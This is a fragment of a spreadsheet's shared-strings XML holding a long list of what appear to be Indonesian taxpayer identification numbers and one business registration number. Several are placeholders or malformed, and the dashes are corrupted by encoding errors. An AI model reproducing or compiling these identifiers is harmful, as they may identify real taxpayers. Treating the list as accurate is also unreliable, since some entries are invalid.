    <t>75‚Äì775‚Äì913‚Äì9‚Äì903‚Äì000</t>
  </si>
  <si>
    <t>02‚Äì321‚Äì173‚Äì3‚Äì034‚Äì000</t>
  </si>
  <si>
    <t>80.260.064.3 609.000</t>
  </si>
  <si>
    <t>03‚Äì095‚Äì705‚Äì4‚Äì809‚Äì000</t>
  </si>
  <si>
    <t>24‚Äì821‚Äì111‚Äì2‚Äì115‚Äì000</t>
  </si>
  <si>
    <t>07‚Äì201‚Äì794‚Äì0‚Äì115‚Äì000</t>
  </si>
  <si>
    <t>73‚Äì361‚Äì880‚Äì5‚Äì115‚Äì000</t>
  </si>
  <si>
    <t>02‚Äì555‚Äì639‚Äì0‚Äì902‚Äì000</t>
  </si>
  <si>
    <t>02‚Äì749‚Äì622‚Äì3‚Äì908‚Äì000</t>
  </si>
  <si>
    <t>02‚Äì797‚Äì983‚Äì0‚Äì903‚Äì000</t>
  </si>
  <si>
    <t>02‚Äì268‚Äì035‚Äì9‚Äì273‚Äì001</t>
  </si>
  <si>
    <t>15‚Äì689‚Äì463‚Äì6‚Äì807‚Äì000</t>
  </si>
  <si>
    <t>75‚Äì430‚Äì254‚Äì5‚Äì516‚Äì000</t>
  </si>
  <si>
    <t>01‚Äì061‚Äì797‚Äì5‚Äì058‚Äì000</t>
  </si>
  <si>
    <t>02‚Äì967‚Äì929‚Äì7‚Äì641‚Äì000</t>
  </si>
  <si>
    <t>73‚Äì461‚Äì332‚Äì6‚Äì821‚Äì000</t>
  </si>
  <si>
    <t>74‚Äì126‚Äì424‚Äì6‚Äì942‚Äì000</t>
  </si>
  <si>
    <t>03‚Äì236‚Äì749‚Äì2‚Äì723‚Äì000</t>
  </si>
  <si>
    <t>31‚Äì795‚Äì668‚Äì8‚Äì432‚Äì000</t>
  </si>
  <si>
    <t>80‚Äì052‚Äì096‚Äì7‚Äì701‚Äì000</t>
  </si>
  <si>
    <t>02‚Äì020‚Äì393‚Äì1‚Äì822‚Äì000</t>
  </si>
  <si>
    <t>03‚Äì167‚Äì505‚Äì1‚Äì732‚Äì001</t>
  </si>
  <si>
    <t>66‚Äì879‚Äì172‚Äì6‚Äì102‚Äì000</t>
  </si>
  <si>
    <t>14‚Äì829‚Äì077‚Äì8‚Äì214‚Äì000</t>
  </si>
  <si>
    <t>83‚Äì830‚Äì390‚Äì7‚Äì813‚Äì000</t>
  </si>
  <si>
    <t>83.604.558.3-001.000</t>
  </si>
  <si>
    <t>31‚Äì452‚Äì552‚Äì8‚Äì119‚Äì000</t>
  </si>
  <si>
    <t>02‚Äì798‚Äì477‚Äì2‚Äì903‚Äì000</t>
  </si>
  <si>
    <t>84‚Äì381‚Äì071‚Äì4‚Äì447‚Äì000</t>
  </si>
  <si>
    <t>84‚Äì386‚Äì296‚Äì2‚Äì447‚Äì000</t>
  </si>
  <si>
    <t>73‚Äì405‚Äì229‚Äì3‚Äì602‚Äì000</t>
  </si>
  <si>
    <t>31‚Äì722‚Äì340‚Äì2‚Äì401‚Äì000</t>
  </si>
  <si>
    <t>03‚Äì092‚Äì630‚Äì7‚Äì627‚Äì000</t>
  </si>
  <si>
    <t>71‚Äì333‚Äì253‚Äì4‚Äì112‚Äì000</t>
  </si>
  <si>
    <t>02‚Äì825‚Äì085‚Äì0‚Äì604‚Äì000</t>
  </si>
  <si>
    <t>73‚Äì846‚Äì738‚Äì0‚Äì627‚Äì000</t>
  </si>
  <si>
    <t>02‚Äì379‚Äì509‚Äì9‚Äì041‚Äì000</t>
  </si>
  <si>
    <t>83‚Äì377‚Äì539‚Äì8‚Äì086‚Äì000</t>
  </si>
  <si>
    <t>01‚Äì000‚Äì065‚Äì1‚Äì903‚Äì001</t>
  </si>
  <si>
    <t>31‚Äì698‚Äì193‚Äì5‚Äì304‚Äì000</t>
  </si>
  <si>
    <t>72‚Äì812‚Äì144‚Äì3‚Äì305‚Äì000</t>
  </si>
  <si>
    <t xml:space="preserve">83.423.330.6-304.000 </t>
  </si>
  <si>
    <t>82‚Äì516‚Äì601‚Äì0‚Äì732‚Äì000</t>
  </si>
  <si>
    <t>01‚Äì871‚Äì415‚Äì4‚Äì033‚Äì000</t>
  </si>
  <si>
    <t>01‚Äì495‚Äì316‚Äì0‚Äì415‚Äì000</t>
  </si>
  <si>
    <t>71‚Äì201‚Äì427‚Äì3‚Äì801‚Äì000</t>
  </si>
  <si>
    <t>83‚Äì789‚Äì387‚Äì4‚Äì027‚Äì000</t>
  </si>
  <si>
    <t>76.328.063.3-942.000</t>
  </si>
  <si>
    <t>01‚Äì000‚Äì065‚Äì1‚Äì051‚Äì000</t>
  </si>
  <si>
    <t>31‚Äì439‚Äì379‚Äì4‚Äì627‚Äì000</t>
  </si>
  <si>
    <t>84‚Äì451‚Äì802‚Äì7‚Äì409‚Äì001</t>
  </si>
  <si>
    <t>03‚Äì040‚Äì254‚Äì9‚Äì041‚Äì000</t>
  </si>
  <si>
    <t>02‚Äì036‚Äì274‚Äì5‚Äì511‚Äì000</t>
  </si>
  <si>
    <t>02‚Äì257‚Äì037‚Äì8‚Äì607‚Äì000</t>
  </si>
  <si>
    <t>74‚Äì501‚Äì651‚Äì9‚Äì943‚Äì000</t>
  </si>
  <si>
    <t>01‚Äì718‚Äì918‚Äì4‚Äì125‚Äì000</t>
  </si>
  <si>
    <t>03‚Äì008‚Äì406‚Äì5‚Äì624‚Äì000</t>
  </si>
  <si>
    <t>70‚Äì632‚Äì118‚Äì9‚Äì545‚Äì000</t>
  </si>
  <si>
    <t>74.829.241.4-214.000</t>
  </si>
  <si>
    <t>58‚Äì717‚Äì548‚Äì0‚Äì545‚Äì000</t>
  </si>
  <si>
    <t>03‚Äì060‚Äì626‚Äì5‚Äì112‚Äì000</t>
  </si>
  <si>
    <t>83‚Äì820‚Äì537‚Äì5‚Äì922‚Äì000</t>
  </si>
  <si>
    <t>69.831.434.1-333.000</t>
  </si>
  <si>
    <t>75‚Äì308‚Äì479‚Äì7‚Äì334‚Äì000</t>
  </si>
  <si>
    <t>22‚Äì000‚Äì000‚Äì0‚Äì003‚Äì333</t>
  </si>
  <si>
    <t>12‚Äì432‚Äì452‚Äì5‚Äì262‚Äì627</t>
  </si>
  <si>
    <t>75‚Äì547‚Äì999‚Äì5‚Äì085‚Äì000</t>
  </si>
  <si>
    <t>12‚Äì345‚Äì678‚Äì9‚Äì011‚Äì234</t>
  </si>
  <si>
    <t>03‚Äì033‚Äì188‚Äì8‚Äì942‚Äì000</t>
  </si>
  <si>
    <t>01‚Äì730‚Äì960‚Äì0‚Äì012‚Äì000</t>
  </si>
  <si>
    <t>02‚Äì908‚Äì538‚Äì8‚Äì057‚Äì000</t>
  </si>
  <si>
    <t>66‚Äì569‚Äì558‚Äì1‚Äì805‚Äì000</t>
  </si>
  <si>
    <t>01‚Äì001‚Äì691‚Äì3‚Äì057‚Äì000</t>
  </si>
  <si>
    <t>01‚Äì328‚Äì570‚Äì5‚Äì007‚Äì000</t>
  </si>
  <si>
    <t>02‚Äì602‚Äì418‚Äì2‚Äì905‚Äì000</t>
  </si>
  <si>
    <t>64‚Äì204‚Äì735‚Äì1‚Äì713‚Äì000</t>
  </si>
  <si>
    <t>01‚Äì317‚Äì659‚Äì9‚Äì416‚Äì001</t>
  </si>
  <si>
    <t>03‚Äì160‚Äì560‚Äì3‚Äì047‚Äì000</t>
  </si>
  <si>
    <t>21‚Äì095‚Äì797‚Äì3‚Äì013‚Äì000</t>
  </si>
  <si>
    <t>03‚Äì084‚Äì949‚Äì1‚Äì033‚Äì000</t>
  </si>
  <si>
    <t>02‚Äì687‚Äì504‚Äì7‚Äì803‚Äì000</t>
  </si>
  <si>
    <t>76.410.117.6.645.000</t>
  </si>
  <si>
    <t>03‚Äì227‚Äì675‚Äì0‚Äì125‚Äì001</t>
  </si>
  <si>
    <t>84‚Äì672‚Äì940‚Äì8‚Äì805‚Äì000</t>
  </si>
  <si>
    <t>73‚Äì594‚Äì234‚Äì4‚Äì418‚Äì000</t>
  </si>
  <si>
    <t>82‚Äì004‚Äì472‚Äì7‚Äì445‚Äì200</t>
  </si>
  <si>
    <t>02‚Äì787‚Äì112‚Äì8‚Äì904‚Äì000</t>
  </si>
  <si>
    <t>02‚Äì571‚Äì619‚Äì2‚Äì941‚Äì000</t>
  </si>
  <si>
    <t>31‚Äì280‚Äì264‚Äì8‚Äì607‚Äì000</t>
  </si>
  <si>
    <t>03.160.560.3-47.000</t>
  </si>
  <si>
    <t>45‚Äì575‚Äì268‚Äì3‚Äì941‚Äì000</t>
  </si>
  <si>
    <t>82‚Äì558‚Äì671‚Äì2‚Äì941‚Äì000</t>
  </si>
  <si>
    <t>02‚Äì256‚Äì916‚Äì0‚Äì614‚Äì000</t>
  </si>
  <si>
    <t>15‚Äì911‚Äì670‚Äì6‚Äì331‚Äì000</t>
  </si>
  <si>
    <t>02‚Äì528‚Äì697‚Äì2‚Äì112‚Äì000</t>
  </si>
  <si>
    <t>45‚Äì882‚Äì546‚Äì0‚Äì042‚Äì000</t>
  </si>
  <si>
    <t>80‚Äì634‚Äì541‚Äì9‚Äì723‚Äì000</t>
  </si>
  <si>
    <t>31‚Äì824‚Äì004‚Äì1‚Äì416‚Äì000</t>
  </si>
  <si>
    <t>35‚Äì758‚Äì201‚Äì4‚Äì411‚Äì000</t>
  </si>
  <si>
    <t>03‚Äì040‚Äì254‚Äì9‚Äì834‚Äì001</t>
  </si>
  <si>
    <t>75‚Äì755‚Äì485‚Äì2‚Äì067‚Äì000</t>
  </si>
  <si>
    <t>72‚Äì051‚Äì083‚Äì3‚Äì403‚Äì000</t>
  </si>
  <si>
    <t>70‚Äì594‚Äì607‚Äì7‚Äì832‚Äì000</t>
  </si>
  <si>
    <t>12‚Äì234‚Äì413‚Äì4‚Äì444‚Äì444</t>
  </si>
  <si>
    <t>03‚Äì325‚Äì362‚Äì6‚Äì801‚Äì001</t>
  </si>
  <si>
    <t>75‚Äì626‚Äì554‚Äì2‚Äì615‚Äì000</t>
  </si>
  <si>
    <t>70‚Äì942‚Äì657‚Äì1‚Äì125‚Äì000</t>
  </si>
  <si>
    <t>02‚Äì759‚Äì303‚Äì7‚Äì112‚Äì000</t>
  </si>
  <si>
    <t>02‚Äì501‚Äì979‚Äì5‚Äì125‚Äì000</t>
  </si>
  <si>
    <t>81‚Äì234‚Äì511‚Äì4‚Äì121‚Äì000</t>
  </si>
  <si>
    <t>81‚Äì789‚Äì269‚Äì8‚Äì086‚Äì000</t>
  </si>
  <si>
    <t>02‚Äì255‚Äì451‚Äì3‚Äì648‚Äì000</t>
  </si>
  <si>
    <t>02‚Äì296‚Äì341‚Äì7‚Äì041‚Äì000</t>
  </si>
  <si>
    <t>75‚Äì921‚Äì685‚Äì6‚Äì023‚Äì000</t>
  </si>
  <si>
    <t>83‚Äì702‚Äì990‚Äì9‚Äì041‚Äì000</t>
  </si>
  <si>
    <t>31‚Äì708‚Äì946‚Äì4‚Äì516‚Äì000</t>
  </si>
  <si>
    <t>01‚Äì870‚Äì966‚Äì7‚Äì033‚Äì000</t>
  </si>
  <si>
    <t>01‚Äì510‚Äì676‚Äì8‚Äì641‚Äì000</t>
  </si>
  <si>
    <t>01.480.126.0-617.000</t>
  </si>
  <si>
    <t>76‚Äì487‚Äì979‚Äì7‚Äì101‚Äì000</t>
  </si>
  <si>
    <t>83‚Äì517‚Äì516‚Äì7‚Äì834‚Äì000</t>
  </si>
  <si>
    <t>73‚Äì373‚Äì179‚Äì9‚Äì834‚Äì000</t>
  </si>
  <si>
    <t>84‚Äì240‚Äì578‚Äì9‚Äì629‚Äì000</t>
  </si>
  <si>
    <t>66‚Äì299‚Äì229‚Äì6‚Äì215‚Äì000</t>
  </si>
  <si>
    <t>01‚Äì737‚Äì545‚Äì2‚Äì034‚Äì000</t>
  </si>
  <si>
    <t>01‚Äì519‚Äì308‚Äì3‚Äì240‚Äì000</t>
  </si>
  <si>
    <t>21‚Äì123‚Äì122‚Äì0‚Äì401‚Äì000</t>
  </si>
  <si>
    <t>02‚Äì682‚Äì024‚Äì1‚Äì823‚Äì001</t>
  </si>
  <si>
    <t>01‚Äì907‚Äì803‚Äì9‚Äì732‚Äì000</t>
  </si>
  <si>
    <t>83‚Äì530‚Äì751‚Äì3‚Äì112‚Äì000</t>
  </si>
  <si>
    <t>97‚Äì325‚Äì265‚Äì3‚Äì527‚Äì000</t>
  </si>
  <si>
    <t>78‚Äì994‚Äì938‚Äì5‚Äì527‚Äì000</t>
  </si>
  <si>
    <t>09‚Äì671‚Äì270‚Äì8‚Äì037‚Äì000</t>
  </si>
  <si>
    <t>66‚Äì029‚Äì449‚Äì7‚Äì426‚Äì000</t>
  </si>
  <si>
    <t>75‚Äì975‚Äì920‚Äì2‚Äì518‚Äì000</t>
  </si>
  <si>
    <t>06‚Äì778‚Äì062‚Äì7‚Äì518‚Äì000</t>
  </si>
  <si>
    <t>03‚Äì183‚Äì089‚Äì6‚Äì041‚Äì000</t>
  </si>
  <si>
    <t>02‚Äì265‚Äì968‚Äì4‚Äì625‚Äì000</t>
  </si>
  <si>
    <t>66‚Äì288‚Äì124‚Äì2‚Äì101‚Äì000</t>
  </si>
  <si>
    <t>84‚Äì519‚Äì102‚Äì2‚Äì404‚Äì000</t>
  </si>
  <si>
    <t>01‚Äì772‚Äì287‚Äì7‚Äì062‚Äì000</t>
  </si>
  <si>
    <t>70‚Äì424‚Äì387‚Äì2‚Äì809‚Äì000</t>
  </si>
  <si>
    <t>02‚Äì714‚Äì433‚Äì6‚Äì612‚Äì000</t>
  </si>
  <si>
    <t>01‚Äì233‚Äì603‚Äì8‚Äì641‚Äì000</t>
  </si>
  <si>
    <t>72‚Äì714‚Äì169‚Äì9‚Äì418‚Äì000</t>
  </si>
  <si>
    <t>01‚Äì621‚Äì291‚Äì2‚Äì624‚Äì001</t>
  </si>
  <si>
    <t>01‚Äì303‚Äì285‚Äì9‚Äì075‚Äì000</t>
  </si>
  <si>
    <t>31‚Äì224‚Äì943‚Äì6‚Äì405‚Äì000</t>
  </si>
  <si>
    <t>07.356.884.2‚Äì311.000</t>
  </si>
  <si>
    <t>16‚Äì707‚Äì723‚Äì9‚Äì311‚Äì000</t>
  </si>
  <si>
    <t>84‚Äì352‚Äì771‚Äì4‚Äì041‚Äì000</t>
  </si>
  <si>
    <t>01‚Äì898‚Äì344‚Äì5‚Äì905‚Äì000</t>
  </si>
  <si>
    <t>01‚Äì696‚Äì446‚Äì2‚Äì903‚Äì001</t>
  </si>
  <si>
    <t>01‚Äì984‚Äì622‚Äì9‚Äì903‚Äì001</t>
  </si>
  <si>
    <t>01‚Äì110‚Äì029‚Äì4‚Äì627‚Äì000</t>
  </si>
  <si>
    <t>72‚Äì975‚Äì134‚Äì7‚Äì822‚Äì000</t>
  </si>
  <si>
    <t>66‚Äì331‚Äì872‚Äì3‚Äì214‚Äì000</t>
  </si>
  <si>
    <t>01‚Äì718‚Äì590‚Äì1‚Äì651‚Äì000</t>
  </si>
  <si>
    <t>02‚Äì419‚Äì025‚Äì8‚Äì059‚Äì000</t>
  </si>
  <si>
    <t>02‚Äì938‚Äì305‚Äì6‚Äì603‚Äì000</t>
  </si>
  <si>
    <t>84‚Äì284‚Äì836‚Äì8‚Äì956‚Äì000</t>
  </si>
  <si>
    <t>66‚Äì290‚Äì811‚Äì0‚Äì653‚Äì000</t>
  </si>
  <si>
    <t>01‚Äì481‚Äì328‚Äì1‚Äì508‚Äì000</t>
  </si>
  <si>
    <t>02‚Äì480‚Äì445‚Äì2‚Äì657‚Äì000</t>
  </si>
  <si>
    <t>01‚Äì925‚Äì358‚Äì2‚Äì651‚Äì000</t>
  </si>
  <si>
    <t>02‚Äì030‚Äì514‚Äì0‚Äì125‚Äì000</t>
  </si>
  <si>
    <t>14‚Äì125‚Äì970‚Äì5‚Äì903‚Äì000</t>
  </si>
  <si>
    <t>76‚Äì164‚Äì194‚Äì3‚Äì903‚Äì000</t>
  </si>
  <si>
    <t>75‚Äì938‚Äì210‚Äì4‚Äì903‚Äì000</t>
  </si>
  <si>
    <t>09‚Äì978‚Äì933‚Äì1‚Äì823‚Äì000</t>
  </si>
  <si>
    <t>80‚Äì864‚Äì647‚Äì5‚Äì801‚Äì000</t>
  </si>
  <si>
    <t>07‚Äì089‚Äì653‚Äì5‚Äì809‚Äì000</t>
  </si>
  <si>
    <t>82‚Äì744‚Äì711‚Äì4‚Äì224‚Äì000</t>
  </si>
  <si>
    <t>81‚Äì209‚Äì004‚Äì1‚Äì452‚Äì000</t>
  </si>
  <si>
    <t>03‚Äì008‚Äì874‚Äì4‚Äì617‚Äì000</t>
  </si>
  <si>
    <t>07‚Äì452‚Äì154‚Äì3‚Äì903‚Äì000</t>
  </si>
  <si>
    <t>02‚Äì217‚Äì767‚Äì9‚Äì903‚Äì000</t>
  </si>
  <si>
    <t>66‚Äì260‚Äì612‚Äì8‚Äì807‚Äì000</t>
  </si>
  <si>
    <t>02‚Äì930‚Äì311‚Äì2‚Äì022‚Äì000</t>
  </si>
  <si>
    <t>01‚Äì462‚Äì184‚Äì1‚Äì308‚Äì000</t>
  </si>
  <si>
    <t>31‚Äì656‚Äì557‚Äì1‚Äì804‚Äì000</t>
  </si>
  <si>
    <t>02‚Äì192‚Äì987‚Äì2‚Äì405‚Äì000</t>
  </si>
  <si>
    <t>16‚Äì444‚Äì588‚Äì4‚Äì212‚Äì000</t>
  </si>
  <si>
    <t>02‚Äì968‚Äì861‚Äì1‚Äì212‚Äì000</t>
  </si>
  <si>
    <t>71‚Äì884‚Äì418‚Äì6‚Äì614‚Äì000</t>
  </si>
  <si>
    <t>82‚Äì980‚Äì042‚Äì6‚Äì334‚Äì000</t>
  </si>
  <si>
    <t>00‚Äì000‚Äì000‚Äì0‚Äì000‚Äì000</t>
  </si>
  <si>
    <t>74‚Äì476‚Äì592‚Äì6‚Äì721‚Äì000</t>
  </si>
  <si>
    <t>76‚Äì403‚Äì310‚Äì6‚Äì402‚Äì000</t>
  </si>
  <si>
    <t>83‚Äì678‚Äì076‚Äì7‚Äì721‚Äì000</t>
  </si>
  <si>
    <t>03‚Äì341‚Äì672‚Äì6‚Äì807‚Äì000</t>
  </si>
  <si>
    <t>84‚Äì282‚Äì160‚Äì5‚Äì047‚Äì000</t>
  </si>
  <si>
    <t>46‚Äì025‚Äì365‚Äì1‚Äì721‚Äì000</t>
  </si>
  <si>
    <t>70‚Äì963‚Äì590‚Äì8‚Äì617‚Äì000</t>
  </si>
  <si>
    <t>73‚Äì741‚Äì468‚Äì0‚Äì643‚Äì000</t>
  </si>
  <si>
    <t>75‚Äì835‚Äì763‚Äì6‚Äì643‚Äì000</t>
  </si>
  <si>
    <t>01‚Äì133‚Äì181‚Äì6‚Äì631‚Äì000</t>
  </si>
  <si>
    <t>14‚Äì126‚Äì376‚Äì4‚Äì223‚Äì000</t>
  </si>
  <si>
    <t>84‚Äì166‚Äì380‚Äì0‚Äì822‚Äì000</t>
  </si>
  <si>
    <t>02‚Äì000‚Äì993‚Äì2‚Äì823‚Äì000</t>
  </si>
  <si>
    <t>81‚Äì736‚Äì173‚Äì6‚Äì811‚Äì000</t>
  </si>
  <si>
    <t>83‚Äì528‚Äì618‚Äì8‚Äì331‚Äì000</t>
  </si>
  <si>
    <t>73‚Äì744‚Äì427‚Äì3‚Äì648‚Äì000</t>
  </si>
  <si>
    <t>02‚Äì009‚Äì744‚Äì0‚Äì604‚Äì000</t>
  </si>
  <si>
    <t>02‚Äì879‚Äì171‚Äì3‚Äì625‚Äì000</t>
  </si>
  <si>
    <t>01‚Äì454‚Äì019‚Äì9‚Äì645‚Äì001</t>
  </si>
  <si>
    <t>07‚Äì846‚Äì566‚Äì3‚Äì648‚Äì000</t>
  </si>
  <si>
    <t>66‚Äì710‚Äì103‚Äì4‚Äì126‚Äì000</t>
  </si>
  <si>
    <t>02‚Äì889‚Äì248‚Äì7‚Äì126‚Äì000</t>
  </si>
  <si>
    <t>24‚Äì020‚Äì737‚Äì3‚Äì629‚Äì000</t>
  </si>
  <si>
    <t>01‚Äì672‚Äì001‚Äì3‚Äì651‚Äì000</t>
  </si>
  <si>
    <t>31‚Äì748‚Äì584‚Äì5‚Äì603‚Äì000</t>
  </si>
  <si>
    <t>01‚Äì795‚Äì459‚Äì5‚Äì522‚Äì000</t>
  </si>
  <si>
    <t>14‚Äì027‚Äì812‚Äì8‚Äì224‚Äì000</t>
  </si>
  <si>
    <t>85‚Äì272‚Äì328‚Äì7‚Äì823‚Äì000</t>
  </si>
  <si>
    <t>01‚Äì475‚Äì610‚Äì0‚Äì823‚Äì000</t>
  </si>
  <si>
    <t>06‚Äì888‚Äì443‚Äì6‚Äì603‚Äì000</t>
  </si>
  <si>
    <t>59‚Äì840‚Äì332‚Äì7‚Äì608‚Äì000</t>
  </si>
  <si>
    <t>45‚Äì467‚Äì505‚Äì9‚Äì504‚Äì000</t>
  </si>
  <si>
    <t>24‚Äì272‚Äì152‚Äì0‚Äì115‚Äì000</t>
  </si>
  <si>
    <t>73‚Äì303‚Äì843‚Äì3‚Äì113‚Äì000</t>
  </si>
  <si>
    <t>85‚Äì020‚Äì656‚Äì6‚Äì115‚Äì000</t>
  </si>
  <si>
    <t>21‚Äì117‚Äì784‚Äì5‚Äì112‚Äì000</t>
  </si>
  <si>
    <t>02‚Äì529‚Äì608‚Äì8‚Äì612‚Äì000</t>
  </si>
  <si>
    <t>81‚Äì035‚Äì062‚Äì9‚Äì402‚Äì000</t>
  </si>
  <si>
    <t>82.714.797.6-801.000</t>
  </si>
  <si>
    <t>02‚Äì154‚Äì574‚Äì4‚Äì511‚Äì000</t>
  </si>
  <si>
    <t>76‚Äì103‚Äì644‚Äì1‚Äì913‚Äì000</t>
  </si>
  <si>
    <t>81‚Äì240‚Äì096‚Äì8‚Äì914‚Äì000</t>
  </si>
  <si>
    <t>01‚Äì002‚Äì749‚Äì8‚Äì811‚Äì001</t>
  </si>
  <si>
    <t>01‚Äì070‚Äì613‚Äì3‚Äì057‚Äì000</t>
  </si>
  <si>
    <t>08‚Äì820‚Äì322‚Äì9‚Äì518‚Äì000</t>
  </si>
  <si>
    <t>77‚Äì318‚Äì653‚Äì1‚Äì648‚Äì000</t>
  </si>
  <si>
    <t>01‚Äì517‚Äì118‚Äì4‚Äì656‚Äì001</t>
  </si>
  <si>
    <t>15‚Äì946‚Äì167‚Äì2‚Äì204‚Äì000</t>
  </si>
  <si>
    <t>59‚Äì840‚Äì330‚Äì1‚Äì608‚Äì000</t>
  </si>
  <si>
    <t>31‚Äì572‚Äì608‚Äì3‚Äì416‚Äì000</t>
  </si>
  <si>
    <t>64‚Äì204‚Äì737‚Äì7‚Äì713‚Äì000</t>
  </si>
  <si>
    <t>01‚Äì606‚Äì198‚Äì8‚Äì415‚Äì000</t>
  </si>
  <si>
    <t>84.744.966.7-823.000</t>
  </si>
  <si>
    <t>25‚Äì169‚Äì805‚Äì6‚Äì115‚Äì000</t>
  </si>
  <si>
    <t>31‚Äì505‚Äì295‚Äì1‚Äì112‚Äì000</t>
  </si>
  <si>
    <t>(NIB) 8120004900484</t>
  </si>
  <si>
    <t>83‚Äì698‚Äì305‚Äì6‚Äì801‚Äì000</t>
  </si>
  <si>
    <t>71‚Äì179‚Äì621‚Äì9‚Äì518‚Äì000</t>
  </si>
  <si>
    <t>02‚Äì817‚Äì473‚Äì8‚Äì617‚Äì001</t>
  </si>
  <si>
    <t>24‚Äì143‚Äì766‚Äì4‚Äì450‚Äì500</t>
  </si>
  <si>
    <t>02‚Äì430‚Äì461‚Äì0‚Äì124‚Äì000</t>
  </si>
  <si>
    <t>31‚Äì588‚Äì384‚Äì3‚Äì034‚Äì000</t>
  </si>
  <si>
    <t>03‚Äì262‚Äì399‚Äì3‚Äì047‚Äì000</t>
  </si>
  <si>
    <t>75‚Äì571‚Äì839‚Äì2‚Äì941‚Äì001</t>
  </si>
  <si>
    <t>24‚Äì933‚Äì775‚Äì9‚Äì702‚Äì000</t>
  </si>
  <si>
    <t>76‚Äì420‚Äì689‚Äì2‚Äì723‚Äì000</t>
  </si>
  <si>
    <t>83.461.656.7-515.000</t>
  </si>
  <si>
    <t>31‚Äì601‚Äì399‚Äì4‚Äì807‚Äì000</t>
  </si>
  <si>
    <t>66‚Äì209‚Äì235‚Äì2‚Äì604‚Äì000</t>
  </si>
  <si>
    <t>72‚Äì892‚Äì260‚Äì0‚Äì642‚Äì001</t>
  </si>
  <si>
    <t>01‚Äì610‚Äì642‚Äì9‚Äì056‚Äì000</t>
  </si>
  <si>
    <t>03‚Äì052‚Äì434‚Äì2‚Äì645‚Äì001</t>
  </si>
  <si>
    <t>21‚Äì123‚Äì389‚Äì5‚Äì426‚Äì000</t>
  </si>
  <si>
    <t>02‚Äì831‚Äì013‚Äì4‚Äì041‚Äì000</t>
  </si>
  <si>
    <t>31‚Äì213‚Äì859‚Äì7‚Äì501‚Äì000</t>
  </si>
  <si>
    <t>01‚Äì438‚Äì688‚Äì2‚Äì641‚Äì000</t>
  </si>
  <si>
    <t>83‚Äì038‚Äì566‚Äì2‚Äì112‚Äì000</t>
  </si>
  <si>
    <t>02‚Äì759‚Äì483‚Äì7‚Äì112‚Äì000</t>
  </si>
  <si>
    <t>02‚Äì759‚Äì339‚Äì5‚Äì112‚Äì000</t>
  </si>
  <si>
    <t>06‚Äì053‚Äì795‚Äì8‚Äì115‚Äì000</t>
  </si>
  <si>
    <t>24‚Äì495‚Äì515‚Äì9‚Äì115‚Äì000</t>
  </si>
  <si>
    <t>02.032.698.9-812.000</t>
  </si>
  <si>
    <t>01‚Äì454‚Äì019‚Äì9‚Äì654‚Äì002</t>
  </si>
  <si>
    <t>03‚Äì218‚Äì352‚Äì5‚Äì801‚Äì000</t>
  </si>
  <si>
    <t>84‚Äì786‚Äì463‚Äì4‚Äì113‚Äì000</t>
  </si>
  <si>
    <t>01‚Äì870‚Äì008‚Äì8‚Äì059‚Äì000</t>
  </si>
  <si>
    <t>01‚Äì548‚Äì145‚Äì0‚Äì025‚Äì000</t>
  </si>
  <si>
    <t>21‚Äì039‚Äì306‚Äì2‚Äì604‚Äì000</t>
  </si>
  <si>
    <t>84‚Äì756‚Äì742‚Äì7‚Äì643‚Äì000</t>
  </si>
  <si>
    <t>06‚Äì405‚Äì373‚Äì9‚Äì627‚Äì000</t>
  </si>
  <si>
    <t>44‚Äì726‚Äì430‚Äì0‚Äì434‚Äì000</t>
  </si>
  <si>
    <t>47‚Äì181‚Äì690‚Äì0‚Äì403‚Äì000</t>
  </si>
  <si>
    <t>02‚Äì451‚Äì137‚Äì0‚Äì402‚Äì000</t>
  </si>
  <si>
    <t>75‚Äì357‚Äì242‚Äì9‚Äì041‚Äì000</t>
  </si>
  <si>
    <t>83.171.786-734.000</t>
  </si>
  <si>
    <t>02‚Äì523‚Äì050‚Äì9‚Äì325‚Äì000</t>
  </si>
  <si>
    <t>01‚Äì991‚Äì532‚Äì1‚Äì325‚Äì000</t>
  </si>
  <si>
    <t>01‚Äì438‚Äì456‚Äì4‚Äì641‚Äì000</t>
  </si>
  <si>
    <t>01‚Äì830‚Äì006‚Äì1‚Äì627‚Äì000</t>
  </si>
  <si>
    <t>84‚Äì569‚Äì144‚Äì3‚Äì027‚Äì000</t>
  </si>
  <si>
    <t>01‚Äì061‚Äì797‚Äì5‚Äì114‚Äì001</t>
  </si>
  <si>
    <t>02‚Äì268‚Äì035‚Äì9‚Äì723‚Äì000</t>
  </si>
  <si>
    <t>21‚Äì151‚Äì107‚Äì6‚Äì432‚Äì000</t>
  </si>
  <si>
    <t>31‚Äì790‚Äì673‚Äì3‚Äì071‚Äì000</t>
  </si>
  <si>
    <t>85‚Äì334‚Äì413‚Äì3‚Äì447‚Äì000</t>
  </si>
  <si>
    <t>14‚Äì325‚Äì791‚Äì3‚Äì913‚Äì000</t>
  </si>
  <si>
    <t>14‚Äì029‚Äì211‚Äì1‚Äì214‚Äì000</t>
  </si>
  <si>
    <t>03‚Äì006‚Äì175‚Äì8‚Äì215‚Äì000</t>
  </si>
  <si>
    <t>14‚Äì675‚Äì424‚Äì7‚Äì214‚Äì000</t>
  </si>
  <si>
    <t>59‚Äì941‚Äì671‚Äì6‚Äì802‚Äì000</t>
  </si>
  <si>
    <t>55‚Äì403‚Äì333‚Äì2‚Äì404‚Äì000</t>
  </si>
  <si>
    <t>45‚Äì631‚Äì597‚Äì7‚Äì403‚Äì000</t>
  </si>
  <si>
    <t>02‚Äì592‚Äì947‚Äì2‚Äì027‚Äì000</t>
  </si>
  <si>
    <t>01‚Äì510‚Äì676‚Äì8‚Äì612‚Äì001</t>
  </si>
  <si>
    <t>84‚Äì299‚Äì083‚Äì0‚Äì619‚Äì000</t>
  </si>
  <si>
    <t>46‚Äì835‚Äì327‚Äì1‚Äì626‚Äì000</t>
  </si>
  <si>
    <t>03‚Äì261‚Äì395‚Äì2‚Äì804‚Äì000</t>
  </si>
  <si>
    <t>01.438.617.1-641.000</t>
  </si>
  <si>
    <t>01‚Äì412‚Äì488‚Äì7‚Äì812‚Äì000</t>
  </si>
  <si>
    <t>84.534.271.6-801.000</t>
  </si>
  <si>
    <t>84‚Äì842‚Äì336‚Äì4‚Äì625‚Äì000</t>
  </si>
  <si>
    <t>02‚Äì175‚Äì449‚Äì4‚Äì606‚Äì000</t>
  </si>
  <si>
    <t>03‚Äì097‚Äì528‚Äì8‚Äì823‚Äì000</t>
  </si>
  <si>
    <t>01‚Äì914‚Äì865‚Äì9‚Äì057‚Äì000</t>
  </si>
  <si>
    <t>66‚Äì431‚Äì024‚Äì0‚Äì041‚Äì000</t>
  </si>
  <si>
    <t>02‚Äì040‚Äì554‚Äì4‚Äì028‚Äì000</t>
  </si>
  <si>
